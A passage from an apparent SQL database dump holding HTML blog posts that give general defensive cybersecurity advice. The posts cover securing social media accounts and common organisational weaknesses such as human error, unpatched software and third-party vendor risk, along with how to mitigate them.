loss.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For professionals and businesses, ensuring social media security also means safeguarding proprietary data and preventing unauthorized access that could disrupt operations. 
By taking the right precautions upfront, you can minimize vulnerabilities and build a strong foundation for account security.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Security Threats on Social Media</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To effectively protect social media accounts, it\'s crucial to understand the common threats they face. Some of the most significant include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Phishing Scams</strong></b>: Sophisticated hackers often send emails or messages designed to trick users into giving away login credentials. These messages typically mimic legitimate notifications from the social platform.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Unauthorized Access</strong></b>: Weak passwords and lack of two-factor authentication make it easier for attackers to break into accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Malware Links</strong></b>: Cybercriminals use malicious links or attachments to compromise devices and steal account information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Social Engineering Attacks</strong></b>: Through deceptive interactions, 
attackers manipulate individuals into divulging sensitive information, like passwords or security codes.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding these threats allows you to proactively guard against them.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Securing Social Media Accounts</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use Strong, Unique Passwords</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the simplest yet most effective ways to secure your accounts is to create strong, unique passwords. Avoid using easily guessable passwords like birthdates, names, or predictable phrases. Instead, follow these tips:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use a combination of uppercase and lowercase letters, numbers, and symbols.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Create passwords that are at least 12 characters long.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Never reuse the same password across multiple accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Consider using a password manager to generate and securely store unique 
passwords.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Enable Two-Factor Authentication (2FA)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Two-factor authentication adds an additional layer of security to your accounts by requiring a second form of verification, such as a one-time code sent to your phone or email. Platforms like Facebook, Twitter, LinkedIn, and Instagram offer this feature. Once 2FA is activated, even if someone obtains your password, they can’t access your account without the secondary verification method.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Regularly Update and Review Privacy Settings</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media platforms frequently update their privacy settings, and failing to review these changes can leave you vulnerable. 
Schedule time every few months to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Adjust who can see your posts and personal information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Limit access to your account to trusted individuals.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Disable unnecessary third-party app integrations.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Avoid Suspicious Links and Messages</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hackers often exploit curiosity and urgency to lead users into clicking malicious links. 
Always:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Be skeptical of unsolicited direct messages or emails claiming urgent requests.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Verify links by hovering over them to check their source before clicking.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Avoid downloading unknown attachments, even from seemingly trusted sources.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Stay Updated on Platform Security Features</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media platforms continually roll out new security features to protect users. For example, Facebook and Instagram provide login activity reports, while LinkedIn offers an account lock feature when suspicious activity is detected. Stay informed about these updates and make full use of the security features available.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Educate Employees and Team Members</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For organizations, protecting social media accounts requires a team effort. 
Conduct regular training sessions to educate employees about:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Using strong passwords and enabling 2FA.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Recognizing phishing attempts and social engineering attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Reporting any suspicious activity immediately.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider creating clear social media account policies and guidelines for employees to follow when managing corporate accounts.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-Life Example of Social Media Security Practices</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One notable example of strong social media security is the case of a leading multinational brand (e.g., Starbucks). After becoming a target of phishing attacks, the company implemented mandatory 2FA for all employees handling social media accounts. Additionally, it provided extensive training on identifying and avoiding phishing scams. 
These measures prevented further breaches, and the company successfully safeguarded its reputation and customer trust.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Wrapping Up</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Securing your social media accounts isn’t optional; it’s a necessity for both personal and professional cybersecurity. By implementing best practices—such as strong passwords, two-factor authentication, regular privacy checks, and staying vigilant against suspicious links—you can significantly reduce risks. For organizations, fostering a culture of security awareness and training employees can further strengthen your digital defense.</p>', '', NULL, NULL, 1, 'draft', '2025-02-08 21:16:19', '2026-01-12 21:41:44', 'Information Security', 'Tips for Keeping Your Social Media Accounts Secure', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(47, 'Identifying and Mitigating Vulnerabilities in Organizational Cybersecurity', 'identifying-and-mitigating-vulnerabilities-in-organizational-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Modern organizations heavily rely on technology to drive operations, foster communication, and spark innovation. However, with technological advancements, the threat landscape continues to grow, exposing businesses to a myriad of cyberattacks. Among these risks, the weakest points in an organization\'s cybersecurity infrastructure are often the most exploited. This detailed guide is designed for cybersecurity learners, aiming to dissect common vulnerabilities, their impact, and the strategies to mitigate them. We\'ll also explore real-world use cases to provide actionable insights.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is the Weakest Link in Organizational Cybersecurity?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Every organization, big or small, has cybersecurity vulnerabilities. However, statistically, the weakest link often lies in <b><strong class=\"font-bold\">human error</strong></b>. Even with the best intentions, employees can inadvertently invite cyber threats through errors such as clicking malicious links, using weak passwords, or misconfiguring internal systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-World Example:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A phishing email sent to an employee at a financial firm appeared to originate from the IT department. 
Clicking the link installed ransomware that encrypted critical company data, leading to a week-long shutdown and a loss of $1 million in revenue.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Weak Points in Cybersecurity Infrastructure</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While vulnerabilities vary across industries and organizations, some common areas are frequently exploited:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Human Error</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cause</strong></b>: Clicking phishing links, poor password management, and falling victim to social engineering attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use Case</strong></b>: A global retailer\'s employee inadvertently sent sensitive customer data via unsecured email, violating GDPR regulations and resulting in hefty fines.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
Outdated Software</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cause</strong></b>: Failing to install the latest updates or relying on systems that have reached end-of-life status.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use Case</strong></b>: The 2017 WannaCry attack targeted organizations using outdated Windows operating systems, affecting 200,000 computers across 150 countries.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Insider Threats</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cause</strong></b>: Negligent actions or malicious activities by employees with access to sensitive systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use Case</strong></b>: A major investment firm experienced a breach when a disgruntled employee exploited admin credentials to leak sensitive information.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. 
Third-Party Risks</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cause</strong></b>: Partners, vendors, or subcontractors with weak cybersecurity practices introducing vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use Case</strong></b>: Target\'s 2013 breach, exposing credit card details of 40 million customers, occurred because attackers accessed networks through a third-party HVAC vendor.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Lack of Cybersecurity Training</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cause</strong></b>: Employees unaware of potential threats or how to handle them.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use Case</strong></b>: An employee of a healthcare provider unknowingly opened a spear-phishing email, leading to the compromise of thousands of patient records and HIPAA violations.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Consequences of Cybersecurity Weaknesses</h2>\r\n<p class=\"text-body font-regular 
leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The impact of these cybersecurity vulnerabilities can be extensive and damaging to an organization. Key consequences include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Data Breaches</strong></b>: Loss or theft of sensitive information, including financial data and IP.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Financial Loss</strong></b>: Ransomware attacks, business disruption, legal penalties, and the cost of remediation.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Reputational Harm</strong></b>: Eroding customer trust and loyalty, possibly leading to loss of business.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Regulatory Penalties</strong></b>: Non-compliance with laws like GDPR, CCPA, or HIPAA can carry significant fines.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-World Statistic:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">According to IBM’s 2023 Cost of a Data Breach report, the average cost of a data breach globally is $4.45 million.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] 
[&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Practical Strategies to Address Cybersecurity Weaknesses</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Employee Training and Awareness</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Invest in regular employee training to recognize and respond to phishing attempts, ransomware threats, and other attacks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tactic</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Conduct phishing simulation tests to evaluate your team\'s ability to detect malicious emails.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Implement Strong Password and Authentication Policies</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use strong, unique passwords for all systems and implement multi-factor authentication (MFA).</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tool Example</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Platforms like LastPass or Okta can ensure password management and MFA integration.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
Regular Updates and Patching</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensure operating systems, software, and plugins are updated with the latest patches to close security gaps.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Use Case</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">After suffering an exploit due to unpatched software, a manufacturing firm began enforcing automated patch management, significantly reducing vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Strengthen Endpoint Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use endpoint protection tools, such as antivirus software, firewalls, and Endpoint Detection and Response (EDR) solutions.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tool Example</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">EDR platforms like CrowdStrike Falcon offer real-time threat detection and response across all connected devices.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. 
Assess Third-Party Vendor Risks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Conduct cybersecurity audits of third-party vendors and enforce strict protocols for data access.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tactic</strong></b>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use third-party risk management tools like Prevalent and RiskRecon to assess vendors.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Foster a Culture of Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Promote a culture where cybersecurity is seen as everyone’s responsibility, not just the IT department’s.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Overcoming Challenges in Cybersecurity Implementation</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Implementing effective cybersecurity strategies isn\'t without challenges. 
Here\'s how organizations can tackle common hurdles:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cost Constraints</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Approach solution providers offering scalable, cost-effective cybersecurity tools tailored to organizational size and budget.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Cultural Resistance</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Create awareness campaigns emphasizing the importance of cybersecurity and its role in protecting both employees and the business.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Skill Gaps</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 
[&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Partner with Managed Security Service Providers (MSSPs) to access expertise and fill resource gaps.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices to Strengthen Cybersecurity Posture</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Zero Trust Architecture</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Require all users and devices to verify credentials before accessing systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 